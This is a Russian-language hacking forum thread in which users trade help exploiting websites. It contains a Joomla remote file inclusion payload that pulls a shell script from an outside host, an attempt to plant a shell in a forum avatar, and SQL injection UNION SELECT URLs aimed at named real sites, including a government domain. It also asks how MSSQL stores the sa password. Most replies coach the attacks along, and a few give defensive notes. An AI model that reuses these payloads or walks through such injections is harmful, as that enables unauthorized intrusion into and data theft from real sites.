Всем привет... подскажите, где в mssql хранятся пароли пользователя sa? и какой у них тип... ну и как шифруется? Спасибо!
Есть занятная RFI в жумле. Пытаюсь поюзать: mosConfig_absolute_path=http://****.ru/sh.txt? Code: Restricted access
Ну вот скажи мне, какая разница между версиями плагина? Джумла устроена так, что сторонние компоненты лотаются довольно просто, добавлением строчки в начало бажного скрипта: PHP: <?php defined( '_JEXEC' ) or die( 'Restricted access' ); ... ?>
Имеется жертва с http://localhost/news.php?do=news&page=2&, Все что следует после 2 обрубается, при подстановке page не int значения или просто пустое выражение вылетает File: /var/www/localhost/news.php Line: 33 MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 1 Я так понимаю кроме расрытие путей это ничего не дает?
Да, GET-параметро обрабатываеться intval'ом и ничего кроме цифр не пускает. А из-за того, что параметр остается пустой, то SQL-запрос становиться невалидный и вылетает ошибка.
vbseo lfi. если в аватарку дописать шелл, и проинклюдить подключает как картинку. ava%00.php пишит ошибку, точнее не срабатывает нулл байт, пробывал заменить слешами тоже самое. Выше директории форума не выйти. Какие есть варианты.?*
Вот такая ситуация скуля в пост запросе делаю так select state from zip where zipcode = '23243'+ORDER+BY+1;--+'; ошибка select state from zip where zipcode = '23243'+ORDER+BY+1000;--+'; тоже ошибка Пробую без кавычек +ORDER+BY+10000;--+ без ошибок выполняет не ответа ни привета, че делать? желательно в пм , помогите уважаемые форумчане
В пост запросах нужно использовать пробел вместо знака плюс(+), т.к. знак плюс(+) именно в гет запросах обозначает пробел, т.е. запрос нужно отправить такой: Code: select state from zip where zipcode = '[B]23243' ORDER BY 1000#[/B] или же: Code: select state from zip where zipcode = '[B]23243' ORDER BY 1000 AND '1'='1[/B]
помогите раскрутить Code: http://www.maine.gov/tools/whatsnew/index.php?topic=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
mybb http://forum.antichat.ru/thread27777.html http://www.securitylab.ru/vulnerability/379819.php http://forum.xakepok.org/showthread.php?t=388 http://securityvulns.ru/docs26044.html http://forum.antichat.ru/showthread.php?t=149667
C завидной регулярностью попадаю на такую штуку. Не получается подобрать кол-во полей. Что не так? Пример, вот. Ошибка не пропадает, хоть убейся. http://www.oaontc.ru/node/243?SysNum=137159
Глаза пошире сделай: Code: http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version()),2,3,4,5,6,7,8/*